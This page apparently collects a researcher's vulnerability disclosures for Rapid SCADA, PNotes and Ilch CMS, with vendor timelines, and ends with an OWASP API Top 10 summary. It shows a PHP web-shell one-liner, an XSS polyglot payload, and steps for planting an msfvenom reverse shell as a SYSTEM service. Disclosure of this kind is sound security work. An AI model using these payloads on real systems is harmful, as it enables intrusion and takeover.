[CVE-2020-22722] – Rapid SCADA Local Privilege Escalation Vulnerability

• 

Product Owner: Rapid Software LLC

Type:  Installable/Customer-Controlled Application

Application Name: Rapid SCADA 5.8.0

Rapid SCADA is an open source industrial automation platform. The out of the box software provides tools for rapid creation of monitoring and control systems. In case of large implementation, Rapid SCADA is used as a core for development of custom SCADA and MES solutions for a Customer.

Open source is the key to software transparency and security. The licensing model permits creation of new derivative software products.

Rapid SCADA is a perfect choice for creating large distributed industrial automation systems. Rapid SCADA runs on servers, embedded computers and in the cloud. Rapid SCADA nodes exchange information between themselves, and interact with external databases in real time.

The main classes of systems developed using Rapid SCADA are the following:

•  Industrial automation systems and IIoT systems.
•  Process control systems.
•  Energy accounting systems.

Product Url: https://rapidscada.org/

Download Url: https://rapidscada.org/download-all-files/download-rapid-scada/

Application Release Date: 2020-01-28

Severity: High

Authentication: Required

Complexity: Hard

Vulnerability Name: Rapid SCADA Local Privilege Escalation Vulnerability via ScadaAgentSvc.exe, ScadaCommSvc.exe

Vulnerability Explanation: Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Tested Os: Windows 10 Pro

Vulnerability Details:

Due to this COVID-19 outbreak, I was testing a lot of open source applications to learn new types of attacks and help our infosec community people to gain more awareness. So by googling I landed to this Rapid SCADA software which is free and it is used by a lot of people.

So installed the application and started with the basic enumeration process to check whether it has any service-related vulnerabilities.

I took a look at the application service just for curiosity and found that that there is no unquoted service path vulnerability.

• 

• 

  Service Enumeration

ScadaAgentConfig.xml – Default directory location

Rapid Scada 5.8.0 Default installation directory

I had a look at the folder permissions of the “C:\ SCADA” folder and Wow! It had been set to “BUILDIN\Users:(OI)(CI)” which means any user can read, write, execute, create, delete do anything inside that folder and it’s subfolders. The ACL rules had OI – Object Inherit and CI – Container Inherit which means all the files in this folder and subfolders have full permissions.

• 

  Weak Folder Permission

Since “ScadaAgentSvc.exe” executable is a Windows service, by planting a malicious program with the same name “ScadaAgentSvc.exe” would result in executing the binary as “NT AUTHORITY\SYSTEM” giving highest privileges in a Windows operating system.

This vulnerability can be used to escalate privileges in a Windows operating system locally. For example, an attacker can plant a reverse shell from a low privileged user account and by restarting the computer, the malicious service will be started as “NT AUTHORITY\SYSTEM” by giving the attacker full system access to the remote PC.

Creating a malicious payload using msfvenom

• 

Transfer to the victim system

• 

Rename the service Exe with payload Exe

Restart the victim and you will gain shell access:

Note: We gain shell access before syh4ck user logging into to the system.

Syh4ck Normal User Lock screen – after restart

Gaining Admin Shell with from User machine

• 

  Gain Reverse shell from ScadaAgentSvc.exe

• 

  Nt authority\System Gain

The following video POC demo – how this issue can be used to escalate privileges and gain a remote shell running as “NT AUTHORITY\SYSTEM”.

RapidScada 5.8 Local Priv POC

Vendor Status:

[21.04.2020] Vulnerability discovered.
[21.04.2020] Vendor contacted.

[24.04.2020] Vendor Acknowledged

[25.04.2020] Applied for CVE

[14-08-2020]- CVE Assigned – CVE-2020-22722

References

https://github.com/RapidScada/scada

Contact

Email– mr.anandmurugan@gmail.com

Twitter – https://twitter.com/syh4ck

Advertisement

[CVE-2020-22721]- Pnotes Insecure .exe File Upload Vulnerability – code execution

• 

Product Owner: PNotes – Andrey Gruber © 2007 – 2020

Type:  Installable/Customer-Controlled Application

Application Name: PNotesNET version 3.8.1.2

Managing your day-to-day life is not an easy job to do. There are so many things for concern – housekeeping, shopping, children… And what about cousin’s birthday that you always forget or important phone numbers? Undoubtedly your working place is covered with dusty yellow (or blue, or pink) sticky notes. If so – PNotes is right for you. Throw the physical stickies away and replace them with virtual ones on your desktop.

PNotes (Pinned Notes or Portable Notes, use what you prefer) exists in two different editions:

• PNotes – the older one, written entirely in plain C and Windows API (with Pelles C for Windows IDE)
• PNotes.NET – the newer one, written in C#, requires .NET Framework 4.5

Product Url: https://pnotes-1932d.firebaseapp.com/home

Download Url:  https://sourceforge.net/projects/pnotes/files/PNotes.NET/Bin/PNotesNET3812Setup.exe/download

Application Release Date: 04 May 2019

Severity: High

Authentication: Required

Complexity: Medium

Vulnerability Name: Pnotes Insecure File Upload Vulnerability using (Miscellaneous – External Programs) and arbitrary code execution

Vulnerability Explanation: Pnotes is manily used for taking notes, especially a third party open source application. We can upload malicious .exe file via Miscellaneous – External programs and perform code execution via command line access.

PNotes Documentation – about External Programs use

Tested Os: Windows 10 Pro

Vulnerability Details:

Creating a malicious payload using msfvenom

Using Msfvenom we create malicious .exe file to upload

Transfer Malocious implant .exe file – Pnshell.exe to victim system :

Pnshell Upload in Miscellaneous – External programs

Uploading implant .Exe file

Click Run to Execute the external program – PnotesShell

Code Execution using Pnshell.exe :

Command Line Access:

Pnotes Revershell

• 

  Pnotes File Upload & cod execution – POC

Vendor Status:

[18.04.2020] Vulnerability discovered.
[18.04.2020] Vendor contacted.

[19.04.2020] CVE applied

[14.08.2020] CVE Assigned – CVE-2020-22721

References

https://pnotes-1932d.firebaseapp.com/news

https://pnotes-1932d.firebaseapp.com/home

Contact

Email– mr.anandmurugan@gmail.com

Twitter – https://twitter.com/syh4ck

[CVE-2019-17046] Ilch – Content Management System V – 2.1.22 Insecure File Upload, LFI & Remote Code Execution Critical Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID – CVE-2019-17046 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17046 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS 2.1.22

Severity: Critical

Authentication: Required

Complexity: Complex

Vulnerability Name: Insecure File upload and Local file inclusion to remote code execution – Ilch CMS Admin Modules

Vulnerability Explanation: 

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Impact:

Local File Inclusion – aka LFI – is one of the most common Web Application vulnerabilities. If conducted successfully, It might allow attackers to read sensitive information, access configuration files or even execute system commands remotely.

An application is vulnerable every time a developer uses the include functions, with an input provided by a user, without validating it. An attacker could easily exploit such a mistake. The main goals of the attacker would be:

• An in depth information gathering (user enumeration, sensitive files, credentials and more).
• A reverse shell to the target machine.

Log Poisoning:

Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.

As the PHP statement “include” also evaluates the input, an inclusion of a malformed file would be evaluated too. If we control the contents of a file available on the vulnerable web application, we could insert PHP code and load the file over the LFI vulnerability to execute our code.Such injections were taking place over the server log files. Such files are the Apache error log, the Access log and more.

Php info:

As shown, we were able to load the PHPInfo file, meaning that our code was executed. Let’s now attempt to execute the proper commands and receive a reverse shell from the target machine.

For the following Php-oneliner payload to execute system commands:

<?php echo shell_exec($_GET[‘e’].’ 2>&1′); ?>

LFI: Local File Inclusion using insecure file upload

Insecure file upload – Allows to add .php extension in the allowed file section (Media module -> settings -> Allowed File -> php

url : http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

Shell.php

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=whoami

Ipconfig:

url: http://localhost/cms/Ilch-v2.1.22/application/modules/media/static/upload/5d9122c079bc3testshell.php?e=ipconfig

Reverse shell:    

Using netcat we can gain reverse shell payload.

Revershell payload used:

Payload – https://github.com/Dhayalanb/windows-php-reverse-shell.git

Remote Code Execution: Remote code execution is the ability an attacker has to access someone else’s computing device and make changes, no matter where the device is geographically located

By listening on port 1234 we can see that a Admin shell has been received.

Affected url :

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/index/index

http://localhost/cms/Ilch-v2.1.22/index.php/admin/media/settings/index

InSecure File to LFI to RCE – Ilch CMS – V 2.1.22

Twitter – https://twitter.com/the_pr0fess0r_

NickName: 4n4nd

[CVE-2019-17045] Ilch – Content Management System V – 2.1.22 Vulnerability disclosure

Product Owner: Ilch – Content Management System

CVE ID: CVE-2019-17045 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17045 )

Type:  Installable/Customer-Controlled Application

Application Name: ilchCMS – 2.1.22 02/01/22

Application Release Date: 23.05.2019

Severity: High

Authentication: Required

Complexity: Easy

Vulnerability Name: Stored Cross-site scripting – XSS Polyglot (Stored)

Vulnerability Explanation:  An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

Browsers Verified In:

Firefox 68.0.2 (64-bit)

Anatomy of the polyglot

• jaVasCript:: A label in ECMAScript; a URI scheme otherwise.
• /*-/*`/*\`/*’/*”/**/: A multi-line comment in ECMAScript; a literal-breaker sequence.
• (/* */oNcliCk=alert() ): A tangled execution zone wrapped in invoking parenthesis!
• //%0D%0A%0d%0a//: A single-line comment in ECMAScript; a double-CRLF in HTTP response headers.
• </stYle/</titLe/</teXtarEa/</scRipt/–!>: A sneaky HTML-tag-breaker sequence.
• \x3csVg/<sVg/oNloAd=alert()//>\x3e: An innocuous svg element.

Impact:

Stored XSS allows an attacker to embed a malicious script into a vulnerable page, which is then executed when a victim views the page. Reflected cross-site scripting relies on a victim being socially engineered into clicking on a malicious link, sent via email for example.

Proof of Concept:  (Stored Cross site scripting – XSS Polyglot (Stored))

Affected items: ilchCMS  2.1.22

Step 1: Host the application using local web server xampp, install the Ilch CMS as per documentation.

Step 2: Go to admin panel

Step 3: Click Modules Tab

Step 4: Under the modules click Jobs Tab

Step 5: Enter the payload in all input field such as title, text, email id

Step 6: Finally click Add – Stored XSS will reflect back on the browser, even after refresh the stored XSS will reflect again.

Xss Payload used :

Html Comment:

<!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1234) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1234)//>\x3e

-->

Url: http://localhost/cms/Ilch-v2.1.22/index.php/admin/jobs/index/treat

• 

Reference:

Website: https://www.ilch.de/

Download Version: https://www.ilch.de/downloads-show-1826.html

Video POC:

• 

ilCh POC – GIF

Twitter – https://twitter.com/the_pr0fess0r_

OWASP API Security Top 10 2019

OWASP API Security Top 10 – 2019

A1	Broken Object Level Authorization	APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using input from the user.
A2	Broken Authentication	Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user’s identities temporarily or permanently. Compromising system’s ability to identify the client/user, compromises API security overall.
A3	Excessive Data Exposure	Looking forward to generic implementations, developers tend to expose all object properties without considering their individual sensitivity, relying on clients to perform the data filtering before displaying it to the user. Without controlling the client’s state, servers receive more-and-more filters which can be abused to gain access to sensitive data.
A4	Lack of Resources & Rate Limiting	Quite often, APIs do not impose any restrictions on the size or number of resources that can be requested by the client/user. Not only can this impact the API server performance, leading to Denial of Service (DoS), but also leaves the door open to authentication flaws such as brute force.
A5	Broken Function Level Authorization	Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers gain access to other users’ resources and/or administrative functions.
A6	Mass Assignment	Binding client provided data (e.g., JSON) to data models, without proper properties filtering based on a whitelist, usually lead to Mass Assignment. Either guessing objects properties, exploring other API endpoints, reading the documentation, or providing additional object properties in request payloads, allows attackers to modify object properties they are not supposed to.
A7	Security Misconfiguration	Security misconfiguration is commonly a result of insecure default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information.
A8	Injection	Injection flaws, such as SQL, NoSQL, Command Injection, etc. occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s malicious data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
A9	Improper Assets Management	APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. Proper hosts and deployed API versions inventory also play an important role to mitigate issues such as deprecated API versions and exposed debug endpoints.
A10	Insufficient Logging & Monitoring	Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems to tamper with, extract, or destroy data. Most breach studies demonstrate the time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.